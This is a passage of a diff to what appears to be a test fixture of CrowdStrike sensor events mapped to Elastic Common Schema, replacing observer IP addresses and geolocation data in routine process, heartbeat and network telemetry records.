"{\"ParentProcessId\":\"362225661973273550\",\"SourceProcessId\":\"362225661973273550\",\"aip\":\"208.210.242.193\",\"SessionProcessId\":\"363970027584976556\",\"SyntheticPR2Flags\":\"8\",\"event_platform\":\"Mac\",\"SVUID\":\"501\",\"id\":\"ffffffff-1111-11eb-8dd4-061759968cdf\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677521162\",\"ProcessGroupId\":\"363970027584976556\",\"event_simpleName\":\"SyntheticProcessRollup2\",\"RawProcessId\":\"9505\",\"ContextTimeStamp\":\"1625677521.137\",\"GID\":\"20\",\"ConfigStateHash\":\"1620585913\",\"SVGID\":\"20\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"501\",\"CommandLine\":\"/bin/sh -s unix:cmd\",\"TargetProcessId\":\"363970027584976556\",\"ImageFileName\":\"/bin/sh\",\"RGID\":\"501\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"SyntheticProcessRollup2MacV3\",\"RUID\":\"501\",\"aid\":\"ffffffffa63e404bba4bff7465ab3afb\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150573500Z", + "original": "{\"ParentProcessId\":\"362225661973273550\",\"SourceProcessId\":\"362225661973273550\",\"aip\":\"67.43.156.14\",\"SessionProcessId\":\"363970027584976556\",\"SyntheticPR2Flags\":\"8\",\"event_platform\":\"Mac\",\"SVUID\":\"501\",\"id\":\"ffffffff-1111-11eb-8dd4-061759968cdf\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677521162\",\"ProcessGroupId\":\"363970027584976556\",\"event_simpleName\":\"SyntheticProcessRollup2\",\"RawProcessId\":\"9505\",\"ContextTimeStamp\":\"1625677521.137\",\"GID\":\"20\",\"ConfigStateHash\":\"1620585913\",\"SVGID\":\"20\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"501\",\"CommandLine\":\"/bin/sh -s unix:cmd\",\"TargetProcessId\":\"363970027584976556\",\"ImageFileName\":\"/bin/sh\",\"RGID\":\"501\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"SyntheticProcessRollup2MacV3\",\"RUID\":\"501\",\"aid\":\"ffffffffa63e404bba4bff7465ab3afb\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:21.162Z", "kind": "event", "action": "SyntheticProcessRollup2", @@ -113,21 +104,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.254.115.95", - "vendor": "crowdstrike", - "ip": "208.254.115.95", "serial_number": "ffffffff3c0846978560dbc0048d6555", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:23.068Z", "ecs": { @@ -135,18 +117,18 @@ }, "related": { "hosts": [ - "208.254.115.95" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.254.115.95" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465437600Z", - "original": "{\"FileDeletedCount\":\"0\",\"DirectoryCreatedCount\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"208.254.115.95\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"event_platform\":\"Mac\",\"NetworkBindCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"id\":\"ffffffff-1111-11eb-9d75-02bcf3ade03b\",\"NewExecutableWrittenCount\":\"0\",\"NetworkCloseCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"SuspectStackCount\":\"0\",\"timestamp\":\"1625677524102\",\"event_simpleName\":\"EndOfProcess\",\"RawProcessId\":\"33454\",\"ContextTimeStamp\":\"1625677523.068\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053603452626914\",\"AsepWrittenCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"NetworkCapableAsepWriteCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"TargetProcessId\":\"365053603452626914\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"name\":\"EndOfProcessMacV15\",\"aid\":\"ffffffff3c0846978560dbc0048d6555\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150583Z", + "original": "{\"FileDeletedCount\":\"0\",\"DirectoryCreatedCount\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"event_platform\":\"Mac\",\"NetworkBindCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"id\":\"ffffffff-1111-11eb-9d75-02bcf3ade03b\",\"NewExecutableWrittenCount\":\"0\",\"NetworkCloseCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"SuspectStackCount\":\"0\",\"timestamp\":\"1625677524102\",\"event_simpleName\":\"EndOfProcess\",\"RawProcessId\":\"33454\",\"ContextTimeStamp\":\"1625677523.068\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053603452626914\",\"AsepWrittenCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"NetworkCapableAsepWriteCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"TargetProcessId\":\"365053603452626914\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"name\":\"EndOfProcessMacV15\",\"aid\":\"ffffffff3c0846978560dbc0048d6555\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:24.102Z", "kind": "event", "action": "EndOfProcess", @@ -190,14 +172,44 @@ "type": "macos" }, "destination": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 546, - "address": "ff88:1:1:ffff:1014:ce99:9b06:ab12", - "ip": "ff88:1:1:ffff:1014:ce99:9b06:ab12" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 547, - "address": "ff88:1:1:ffff:fa2d:c0ff:fe6f:70a0", - "ip": "ff88:1:1:ffff:fa2d:c0ff:fe6f:70a0" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" @@ -206,30 +218,18 @@ "preserve_original_event" ], "network": { - "community_id": "1:2uBRQNCSMl+LoHx8oqqmCIMR3vs=", + "community_id": "1:ZmJm1KFUrdmL4/rYSRwMQ18GXnk=", "transport": "udp", "iana_number": "17", "direction": "unknown" }, "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-IA", - "city_name": "Roland", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Iowa", - "location": { - "lon": -93.5063, - "lat": 42.1646 - } - }, - "address": "208.126.205.223", - "vendor": "crowdstrike", - "ip": "208.126.205.223", "serial_number": "ffffffffc59c473aa7fcbbe7438082cb", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:48.594Z", "ecs": { @@ -237,22 +237,20 @@ }, "related": { "hosts": [ - "208.126.205.223", - "ff88:1:1:ffff:fa2d:c0ff:fe6f:70a0", - "ff88:1:1:ffff:1014:ce99:9b06:ab12" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "hash": [ "1620585913" ], "ip": [ - "208.126.205.223", - "ff88:1:1:ffff:fa2d:c0ff:fe6f:70a0", - "ff88:1:1:ffff:1014:ce99:9b06:ab12" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465444600Z", - "original": "{\"event_simpleName\":\"RawBindIP6\",\"ContextTimeStamp\":\"1625677488.594\",\"LocalAddressIP6\":\"ff88:1:1:ffff:fa2d:c0ff:fe6f:70a0\",\"RemoteAddressIP6\":\"ff88:1:1:ffff:1014:ce99:9b06:ab12\",\"ConfigStateHash\":\"1620585913\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"365042236081053654\",\"RemotePort\":\"546\",\"aip\":\"208.126.205.223\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"547\",\"Entitlements\":\"15\",\"name\":\"RawBindIP6MacV10\",\"id\":\"ffffffff-1111-11eb-ad8d-064c77be2fd1\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffffc59c473aa7fcbbe7438082cb\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677488615\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150589500Z", + "original": "{\"event_simpleName\":\"RawBindIP6\",\"ContextTimeStamp\":\"1625677488.594\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"RemoteAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"1620585913\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"365042236081053654\",\"RemotePort\":\"546\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"547\",\"Entitlements\":\"15\",\"name\":\"RawBindIP6MacV10\",\"id\":\"ffffffff-1111-11eb-ad8d-064c77be2fd1\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffffc59c473aa7fcbbe7438082cb\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677488615\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:48.615Z", "kind": "event", "action": "RawBindIP6", @@ -311,21 +309,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.130.207.129", - "vendor": "crowdstrike", - "ip": "208.130.207.129", "serial_number": "ffffffff59fe460783ea45d59e417d6f", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:04.527Z", "ecs": { @@ -333,19 +322,19 @@ }, "related": { "hosts": [ - "208.130.207.129" + "67.43.156.14" ], "hash": [ "f8bd34d4ac025f862c6fe8f3fd3f170072f94f1f2ec9dc6cb2d7925422b77018", "1620585913" ], "ip": [ - "208.130.207.129" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465451300Z", - "original": "{\"event_simpleName\":\"ProcessRollup2Stats\",\"ConfigStateHash\":\"1620585913\",\"Timeout\":\"600\",\"aip\":\"208.130.207.129\",\"SHA256HashData\":\"f8bd34d4ac025f862c6fe8f3fd3f170072f94f1f2ec9dc6cb2d7925422b77018\",\"ProcessCount\":\"4\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"502\",\"event_platform\":\"Mac\",\"CommandLine\":\"ruby --disable-gems sorbet/feature_dependency_plugin.rb --class EmergingAlbertsonsPickupBannerDiscount --method feature_dependency --source feature_dependency Domain::FeatureDependencies::RouletteUserFeature.new(\\n feature_name: FEATURE_NAME,\\n variants: [FEATURE_VARIANT],\\n )\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2StatsMacV1\",\"id\":\"ffffffff-1111-11eb-822b-06081a3f0f45\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff59fe460783ea45d59e417d6f\",\"timestamp\":\"1625677504527\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150595900Z", + "original": "{\"event_simpleName\":\"ProcessRollup2Stats\",\"ConfigStateHash\":\"1620585913\",\"Timeout\":\"600\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"f8bd34d4ac025f862c6fe8f3fd3f170072f94f1f2ec9dc6cb2d7925422b77018\",\"ProcessCount\":\"4\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"502\",\"event_platform\":\"Mac\",\"CommandLine\":\"ruby --disable-gems sorbet/feature_dependency_plugin.rb --class EmergingAlbertsonsPickupBannerDiscount --method feature_dependency --source feature_dependency Domain::FeatureDependencies::RouletteUserFeature.new(\\n feature_name: FEATURE_NAME,\\n variants: [FEATURE_VARIANT],\\n )\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2StatsMacV1\",\"id\":\"ffffffff-1111-11eb-822b-06081a3f0f45\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff59fe460783ea45d59e417d6f\",\"timestamp\":\"1625677504527\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:04.527Z", "kind": "state", "action": "ProcessRollup2Stats", @@ -373,24 +362,12 @@ }, { "observer": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-EAL", - "city_name": "Greenford", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Ealing", - "location": { - "lon": -0.3333, - "lat": 51.5167 - } - }, - "address": "208.49.81.196", - "vendor": "crowdstrike", - "ip": "208.49.81.196", "serial_number": "ffffffffe1ad47b6b5b44ae9151a6cf3", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:14.783Z", "os": { @@ -401,18 +378,18 @@ }, "related": { "hosts": [ - "208.49.81.196" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.49.81.196" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465458Z", - "original": "{\"event_simpleName\":\"SensorHeartbeat\",\"ConfigStateHash\":\"3090255842\",\"NetworkContainmentState\":\"0\",\"aip\":\"208.49.81.196\",\"ConfigIDBase\":\"65994753\",\"SensorStateBitMap\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"ConfigurationVersion\":\"10\",\"Entitlements\":\"15\",\"name\":\"SensorHeartbeatMacV4\",\"ConfigIDPlatform\":\"4\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"ConfigIDBuild\":\"13701\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffe1ad47b6b5b44ae9151a6cf3\",\"ProvisionState\":\"1\",\"timestamp\":\"1625677514783\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150602200Z", + "original": "{\"event_simpleName\":\"SensorHeartbeat\",\"ConfigStateHash\":\"3090255842\",\"NetworkContainmentState\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigIDBase\":\"65994753\",\"SensorStateBitMap\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"ConfigurationVersion\":\"10\",\"Entitlements\":\"15\",\"name\":\"SensorHeartbeatMacV4\",\"ConfigIDPlatform\":\"4\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"ConfigIDBuild\":\"13701\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffe1ad47b6b5b44ae9151a6cf3\",\"ProvisionState\":\"1\",\"timestamp\":\"1625677514783\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:14.783Z", "kind": "event", "action": "SensorHeartbeat", @@ -478,21 +455,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.24.129.49", - "vendor": "crowdstrike", - "ip": "208.24.129.49", "serial_number": "ffffffff8be84591864008eb2e484920", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:02.500Z", "ecs": { @@ -500,7 +468,7 @@ }, "related": { "hosts": [ - "208.24.129.49" + "67.43.156.14" ], "hash": [ "88922d50263b059696c2af5a99906562", @@ -508,12 +476,12 @@ "1620585913" ], "ip": [ - "208.24.129.49" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465464900Z", - "original": "{\"MachOSubType\":\"1\",\"ParentProcessId\":\"362213307092004097\",\"SourceProcessId\":\"362213307092004097\",\"aip\":\"208.24.129.49\",\"SessionProcessId\":\"362213307092004097\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"event_platform\":\"Mac\",\"ProcessEndTime\":\"\",\"SVUID\":\"0\",\"ParentBaseFileName\":\"launchd\",\"id\":\"ffffffff-1111-11eb-a9ce-02e9216bdbcb\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677502500\",\"ProcessGroupId\":\"362213307092004097\",\"event_simpleName\":\"ProcessRollup2\",\"RawProcessId\":\"56254\",\"GID\":\"0\",\"ConfigStateHash\":\"1620585913\",\"SVGID\":\"0\",\"MD5HashData\":\"88922d50263b059696c2af5a99906562\",\"SHA256HashData\":\"d4ff1c438e330777002332a305fcf965cfaa7d0dbeb899293d347298cbf6d4b6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"CommandLine\":\"xpcproxy com.apple.mdworker.shared.01000000-0600-0000-0000-000000000000\",\"TargetProcessId\":\"363276350115996101\",\"ImageFileName\":\"/usr/libexec/xpcproxy\",\"RGID\":\"0\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2MacV5\",\"RUID\":\"0\",\"ProcessStartTime\":\"1625677502.233\",\"aid\":\"ffffffff8be84591864008eb2e484920\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150608400Z", + "original": "{\"MachOSubType\":\"1\",\"ParentProcessId\":\"362213307092004097\",\"SourceProcessId\":\"362213307092004097\",\"aip\":\"67.43.156.14\",\"SessionProcessId\":\"362213307092004097\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"event_platform\":\"Mac\",\"ProcessEndTime\":\"\",\"SVUID\":\"0\",\"ParentBaseFileName\":\"launchd\",\"id\":\"ffffffff-1111-11eb-a9ce-02e9216bdbcb\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677502500\",\"ProcessGroupId\":\"362213307092004097\",\"event_simpleName\":\"ProcessRollup2\",\"RawProcessId\":\"56254\",\"GID\":\"0\",\"ConfigStateHash\":\"1620585913\",\"SVGID\":\"0\",\"MD5HashData\":\"88922d50263b059696c2af5a99906562\",\"SHA256HashData\":\"d4ff1c438e330777002332a305fcf965cfaa7d0dbeb899293d347298cbf6d4b6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"CommandLine\":\"xpcproxy com.apple.mdworker.shared.01000000-0600-0000-0000-000000000000\",\"TargetProcessId\":\"363276350115996101\",\"ImageFileName\":\"/usr/libexec/xpcproxy\",\"RGID\":\"0\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2MacV5\",\"RUID\":\"0\",\"ProcessStartTime\":\"1625677502.233\",\"aid\":\"ffffffff8be84591864008eb2e484920\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:02.500Z", "kind": "event", "action": "ProcessRollup2", @@ -556,24 +524,9 @@ "type": "linux" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 701, - "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" - } - }, - "address": "208.230.0.2", "port": 53, - "ip": "208.230.0.2" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "source": { "port": 39920, @@ -587,27 +540,18 @@ "preserve_original_event" ], "network": { - "community_id": "1:YkZ7Gqgmc/E4zJF1lpoyNc7PxC4=", + "community_id": "1:urvmigA14TUbvxTimPg744QEiSA=", "transport": "udp", "iana_number": "17", "direction": "inbound" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.238.3.157", - "vendor": "crowdstrike", - "ip": "208.238.3.157", "serial_number": "ffffffff5a2e420c99f6b6d3a5d9de9b", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011308.1" + "version": "1007.8.0011308.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:04.982Z", "ecs": { @@ -615,22 +559,20 @@ }, "related": { "hosts": [ - "208.238.3.157", - "0.0.0.0", - "208.230.0.2" + "67.43.156.14", + "0.0.0.0" ], "hash": [ "1701000200" ], "ip": [ - "208.238.3.157", - "0.0.0.0", - "208.230.0.2" + "67.43.156.14", + "0.0.0.0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465471600Z", - "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkReceiveAcceptIP4\",\"ContextTimeStamp\":\"1625677504.982\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"17307488247882\",\"RemotePort\":\"53\",\"aip\":\"208.238.3.157\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"39920\",\"Entitlements\":\"15\",\"name\":\"NetworkReceiveAcceptIP4LinV5\",\"id\":\"ffffffff-1111-11eb-9d7c-02e8a46f51a5\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff5a2e420c99f6b6d3a5d9de9b\",\"RemoteAddressIP4\":\"208.230.0.2\",\"ConnectionDirection\":\"1\",\"InContext\":\"0\",\"timestamp\":\"1625677505511\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150614800Z", + "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkReceiveAcceptIP4\",\"ContextTimeStamp\":\"1625677504.982\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"17307488247882\",\"RemotePort\":\"53\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"39920\",\"Entitlements\":\"15\",\"name\":\"NetworkReceiveAcceptIP4LinV5\",\"id\":\"ffffffff-1111-11eb-9d7c-02e8a46f51a5\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff5a2e420c99f6b6d3a5d9de9b\",\"RemoteAddressIP4\":\"67.43.156.14\",\"ConnectionDirection\":\"1\",\"InContext\":\"0\",\"timestamp\":\"1625677505511\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:05.511Z", "kind": "event", "action": "NetworkReceiveAcceptIP4", @@ -668,24 +610,9 @@ "ip": "0.0.0.0" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 1239, - "organization": { - "name": "Sprint" - } - }, - "address": "208.30.0.2", "port": 53, - "ip": "208.30.0.2" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "url": { "scheme": "http" @@ -699,21 +626,12 @@ "direction": "unknown" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.215.150.206", - "vendor": "crowdstrike", - "ip": "208.215.150.206", "serial_number": "ffffffff01fc49949cf06bf0bce3c010", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:21.866Z", "ecs": { @@ -721,22 +639,20 @@ }, "related": { "hosts": [ - "208.215.150.206", - "208.30.0.2", + "67.43.156.14", "0.0.0.0" ], "hash": [ "3090255842" ], "ip": [ - "208.215.150.206", - "208.30.0.2", + "67.43.156.14", "0.0.0.0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465478400Z", - "original": "{\"LocalAddressIP4\":\"208.30.0.2\",\"event_simpleName\":\"RawBindIP4\",\"ContextTimeStamp\":\"1625677521.866\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"362579458925546303\",\"RemotePort\":\"0\",\"aip\":\"208.215.150.206\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"53\",\"Entitlements\":\"15\",\"name\":\"RawBindIP4MacV10\",\"id\":\"ffffffff-1111-11eb-81d4-0282ad9ac82d\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff01fc49949cf06bf0bce3c010\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677522009\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150621Z", + "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"RawBindIP4\",\"ContextTimeStamp\":\"1625677521.866\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"362579458925546303\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"53\",\"Entitlements\":\"15\",\"name\":\"RawBindIP4MacV10\",\"id\":\"ffffffff-1111-11eb-81d4-0282ad9ac82d\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff01fc49949cf06bf0bce3c010\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677522009\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:22.009Z", "kind": "event", "action": "RawBindIP4", @@ -789,24 +705,12 @@ "direction": "outbound" }, "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-OR", - "city_name": "Gresham", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Oregon", - "location": { - "lon": -122.4167, - "lat": 45.5152 - } - }, - "address": "208.187.110.246", - "vendor": "crowdstrike", - "ip": "208.187.110.246", "serial_number": "ffffffff083845f68a7de3d95cb34361", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:23.901Z", "ecs": { @@ -814,7 +718,7 @@ }, "related": { "hosts": [ - "208.187.110.246", + "67.43.156.14", "0:0:0:0:0:0:0:0", "127.0.0.1" ], @@ -822,14 +726,14 @@ "3090255842" ], "ip": [ - "208.187.110.246", + "67.43.156.14", "0:0:0:0:0:0:0:0", "127.0.0.1" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465485100Z", - "original": "{\"event_simpleName\":\"NetworkConnectIP6\",\"ContextTimeStamp\":\"1625677523.901\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemoteAddressIP4\":\"127.0.0.1\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364783686797112486\",\"RemotePort\":\"50626\",\"aip\":\"208.187.110.246\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"0\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP6MacV10\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff083845f68a7de3d95cb34361\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677524048\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150627200Z", + "original": 